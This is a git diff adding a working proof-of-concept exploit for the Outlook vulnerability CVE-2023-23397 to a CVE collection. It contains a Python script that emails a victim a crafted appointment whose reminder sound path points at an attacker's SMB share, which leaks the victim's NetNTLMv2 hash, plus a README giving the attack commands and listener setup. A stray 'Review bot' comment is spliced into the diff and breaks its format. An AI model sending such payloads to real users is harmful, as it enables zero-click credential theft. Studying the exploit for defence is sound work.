diff --git a/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py b/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py
new file mode 100644
index 0000000000000000000000000000000000000000..e40c73189c506f639e6487bee69f16ca6a3ca97e
--- /dev/null
+++ b/cve/Outlook/2023/CVE-2023-23397/CVE-2023-23397.py
@@ -0,0 +1,70 @@
+import smtplib, datetime, argparse
+from email.mime.multipart import MIMEMultipart
+from email.mime.text import MIMEText
+from email.mime.application import MIMEApplication
+from email.utils import COMMASPACE, formatdate
+from independentsoft.msg import Message
+
+# Mail configuration : change it !
+smtp_server = "mail.example.com"
+smtp_port = 587
+
+sender_email = "attacker@mail.example.com"
+sender_password = "P@ssw0rd"
+
+recipients_email = ["victim@mail.example.com"]
+
+class Email:
+    def __init__(self, smtp_server, port, username, password, recipient):
+        self.smtp_server = smtp_server
+        self.port = port
+        self.username = username
+        self.password = password
+        self.recipient = recipient
+
+    def send(self, subject, body, attachment_path):
+        msg = MIMEMultipart()
+        msg['From'] = self.username
+        msg['To'] = COMMASPACE.join(self.recipient)
+        msg['Date'] = formatdate(localtime=True)
+        msg['Subject'] = subject
+
+        msg.attach(MIMEText(body))
+
+        with open(attachment_path, 'rb') as f:
+            part = MIMEApplication(f.read(), Name=attachment_path)
+        part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'
+        msg.attach(part)
+
+        try:
+            server = smtplib.SMTP(self.smtp_server, self.port)
+            server.starttls()
+            server.login(self.username, self.password)
+            server.sendmail(self.username, self.recipient, msg.as_string())
+            server.quit()
+            print("[+] Malicious appointment sent !")
+
+
+        except Exception as e:
+            print("[-] Error with SMTP server...", e)
+
+parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')
+parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)
+args = parser.parse_args()
+
+appointment = Message()
+appointment.message_class = "IPM.Appointment"
+appointment.subject = "CVE-2023-23397"
+appointment.body = "New meeting now !"
+appointment.location = "Paris"
+appointment.appointment_start_time = datetime.datetime.now()
+appointment.appointment_end_time = datetime.datetime.now()
+appointment.reminder_override_default = True
+appointment.reminder_sound_file = args.path
+appointment.save("appointment.msg")
+
+email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
+
+subject = "Hello There !"
+body = "Important appointment !"
+email.send(subject, body, "appointment.msg")
diff --git a/cve/Outlook/2023/CVE-2023-23397/README.md b/cve/Outlook/2023/CVE-2023-23397/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..094e829ddabb253e6a57cd3da7e803ace7dac17f
--- /dev/null
+++ b/cve/Outlook/2023/CVE-2023-23397/README.md
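Review bot: `Email.send` authenticates to the SMTP server over a STARTTLS session whose certificate is never verified — `server.starttls()` is called with no `context`, and in CPython's smtplib that falls back to an unverified default context, so the mailbox password held in `sender_password` is exposed to an on-path attacker; pass `server.starttls(context=ssl.create_default_context())` (with `import ssl` alongside the other imports). `server.quit()` is reached only on the success path, so any failure after `smtplib.SMTP(...)` leaves the connection open; opening it as `with smtplib.SMTP(self.smtp_server, self.port) as server:` closes it on every path and also lets the broad `except Exception` shrink to `smtplib.SMTPException`. The credentials are also committed as module literals (`sender_password = "P@ssw0rd"`) and would be better read from the environment or an interactive prompt than edited into the source. Finally, the `--path` help text `'Local path to process'` does not describe what the value does — it is written to `appointment.reminder_sound_file`, and the README passes it as `'\\yourip\'` — so `help='UNC path of the listening SMB share, e.g. \\\\attacker-ip\\share'` would match its actual use.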
@@ -0,0 +1,41 @@
+# CVE-2023-23397
+
+Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.
+
+## Description
+
+Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).
+
+An attacker exploiting this vulnerability retrieves a NetNTLMv2 digest based on the password of the trapped user through an SMB request. The request is triggered as soon as the mail arrives in the inbox.
+
+## What does the poc do?
+
+1. Generated `.msg` payload.
+2. Send it by email with custom SMTP server.
+
+## Usage
+
+In one session :
+
+```python
+python CVE-2023-23397.py
+
+usage: CVE-2023-23397.py [-h] -p PATH
+CVE-2023-23397.py: error: the following arguments are required: -p/--path
+
+python CVE-2023-23397.py --path '\\yourip\'
+```
+
+In a second session (`smbserver` or `responder` as you want).
+
+```
+smbserver.py -smb2support SHARE .
+```
+
+## Demo (manual poc)
+
+![poc](poc.gif)
+
+## Original article
+
+https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
\ No newline at end of file
diff --git a/cve/Outlook/2023/yaml/CVE-2023-23397.yaml b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..11f0fd086319ad74ef1f9036891f68b337111330
--- /dev/null
+++ b/cve/Outlook/2023/yaml/CVE-2023-23397.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-23397
+source: https://github.com/Trackflaw/CVE-2023-23397
+info:
+  name: Microsoft Outlook 特权提升漏洞。Outlook缺乏对允许配置会议和约会提醒声音的用户输入的控制,攻击者能够强制受害者连接到其服务器,而无需用户进行任何操作(零点击漏洞)。利用此漏洞的攻击者通过SMB请求根据受困用户的密码检索NetNTLMv2摘要。一旦邮件到达收件箱,请求就会被触发。
+  severity: critical
+  description: |
+    Outlook suffers from a lack of control over the user input that allows to configure the sound of a meeting and appointment reminder. Indeed, an attacker is able to force a victim to make a connection to its server without any manipulation from the user (zero click vulnerability).
+  scope-of-influence:
+    outlook-2013, outlook-2016, outlook-2019
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-23397
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-23397
+    cwe-id: CWE-294
+    cnvd-id: None
+    kve-id: None
+  tags: Microsoft, Outlook, cve2023, 权限提升漏洞
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 428354b052e24bcd706182b37e638525cdc3550c..6dcfa282aef0decb0e4685ef86208147412a5082 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -13,6 +13,8 @@ cve:
     - CVE-2023-0179
   polkit:
     - CVE-2021-3560
+  Outlook:
+    - CVE-2023-23397
   redis:
     - CVE-2022-0543
   EsFileExplorer: